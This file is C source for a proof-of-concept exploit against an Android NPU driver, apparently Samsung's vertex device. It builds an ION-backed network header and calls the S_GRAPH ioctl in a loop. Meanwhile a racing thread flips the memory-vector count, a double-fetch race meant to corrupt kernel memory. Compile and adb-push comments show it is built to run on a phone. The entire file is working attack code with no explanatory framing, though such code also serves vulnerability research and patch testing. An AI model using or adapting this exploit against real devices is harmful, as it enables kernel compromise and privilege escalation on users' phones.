/* aarch64-linux-gnu-gcc -o npu01 npu01.c -lpthread -static
   adb push npu01 /data/local/tmp
 */

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>

typedef uint32_t __u32;
typedef uint32_t u32;
typedef int32_t __s32;
typedef uint64_t __u64;

struct ion_allocation_data {
        __u64 len;
        __u32 heap_id_mask;
        __u32 flags;
        __u32 fd;
        __u32 unused;
};

#define ION_IOC_MAGIC           'I'

#define ION_IOC_ALLOC           _IOWR(ION_IOC_MAGIC, 0, struct ion_allocation_data)

#define ION_FLAG_CACHED 1

struct vs4l_graph {
        __u32                   id;
        __u32                   priority;
        __u32                   time; /* in millisecond */
        __u32                   flags;
        __u32                   size;
        unsigned long           addr;
};

#define VS4L_VERTEXIOC_S_GRAPH                  _IOW('V', 0, struct vs4l_graph)

struct drv_usr_share {
        unsigned int id;
        int ncp_fd;
        unsigned int ncp_size;
        unsigned long ncp_mmap;
};

struct ncp_header {
        u32     magic_number1;
        u32     hdr_version;
        u32     hdr_size;
        u32     intrinsic_version;
        u32     net_id;
        u32     unique_id;
        u32     priority;
        u32     flags;
        u32     period;
        u32     workload;
        u32     address_vector_offset;
        u32     address_vector_cnt;
        u32     memory_vector_offset;
        u32     memory_vector_cnt;
        u32     chunk_vector_offset;
        u32     chunk_vector_cnt;
        u32     group_vector_offset;
        u32     group_vector_cnt;
        u32     body_version;
        u32     body_offset;
        u32     body_size;
        u32     blob_vector_offset;
        u32     blob_vector_cnt;
        u32     reserved[10];
        u32     magic_number2;
};

enum ncp_memory_type {
        MEMORY_TYPE_IN_FMAP, /* input feature map */
        MEMORY_TYPE_OT_FMAP, /* output feature map */
        MEMORY_TYPE_IM_FMAP, /* intermediate feature map */
        MEMORY_TYPE_OT_PIX0,
        MEMORY_TYPE_OT_PIX1,
        MEMORY_TYPE_OT_PIX2,
        MEMORY_TYPE_OT_PIX3,
        MEMORY_TYPE_WEIGHT,
        MEMORY_TYPE_WMASK,
        MEMORY_TYPE_LUT,
        MEMORY_TYPE_NCP,
        MEMORY_TYPE_GOLDEN,
        MEMORY_TYPE_CUCODE,
        MEMORY_TYPE_MAX
};

struct memory_vector {
        u32     type;
        u32     pixel_format;
        u32     width;
        u32     height;
        u32     stride;
        u32     channels;
        u32     cstride;
        u32     address_vector_index;
};

void *switch_value(void *ion_buf) {
	volatile struct ncp_header *ncp;
	unsigned int i;

	ncp = (struct ncp_header *) ion_buf;

	for (i = 1; i != 0; i++) {
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
		ncp->memory_vector_cnt = 1;
		ncp->memory_vector_cnt = 32;
	}

	return NULL;
}

int main(void) {
	int ion_fd, fd, ret, i, found_system;
	struct ion_handle_data ion_hdl;
	struct ion_heap_query ion_query;
	struct ion_allocation_data ion_alloc;
	void *ion_buf;
	struct vs4l_graph vgr;
	struct drv_usr_share usr_data;
	struct ncp_header *ncp;
	struct memory_vector *mv;
	pthread_t switch_thread;

	ion_fd = open("/dev/ion", O_RDONLY|O_CLOEXEC);

	if (ion_fd == -1) {
		perror("ion open");
		return-1;
	}

	memset(&ion_alloc, 0, sizeof(struct ion_allocation_data));

	ion_alloc.len = 4096;
	ion_alloc.heap_id_mask = 1;
	/*ion_alloc.flags = ION_FLAG_CACHED;*/

	ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc);

	if (ret == -1) {
		perror("ioctl ION_IOC_ALLOC");
		return -1;
	}

	ion_buf = mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED, ion_alloc.fd, 0);

	if (ion_buf == MAP_FAILED) {
		perror("ion mmap");
		return -1;
	}

	fd = open("/dev/vertex10", O_RDWR);

	if (fd == -1) {
		perror("open");
		return -1;
	}

	memset(&vgr, 0, sizeof(struct vs4l_graph));
	memset(&usr_data, 0, sizeof(struct drv_usr_share));

	usr_data.ncp_fd = ion_alloc.fd;
	usr_data.ncp_size = 4096;

	vgr.addr = (unsigned long) &usr_data;

	ncp = (struct ncp_header *) ion_buf;
	ncp->memory_vector_cnt = 1;
	ncp->memory_vector_offset = sizeof(struct ncp_header);
	ncp->intrinsic_version = 0x41414141;

	mv = (struct memory_vector *) ((char *) ion_buf + sizeof(struct ncp_header));

	for (i = 0; i < 64; i++) {
		memset(mv, i, sizeof(struct memory_vector));
		mv->type = MEMORY_TYPE_IN_FMAP;
		mv->address_vector_index = 4*i;
		mv++;
	}

	while (1) {
		ret = pthread_create(&switch_thread, NULL, switch_value, ion_buf);

		if (ret != 0) {
			perror("pthread_create");
			return -1;
		}

		ret = ioctl(fd, VS4L_VERTEXIOC_S_GRAPH, &vgr);

		if (ret == -1) {
			perror("ioctl VS4L_VERTEXIOC_S_GRAPH");
		}
	}

	close(fd);

	close(ion_fd);

	return 0;
}
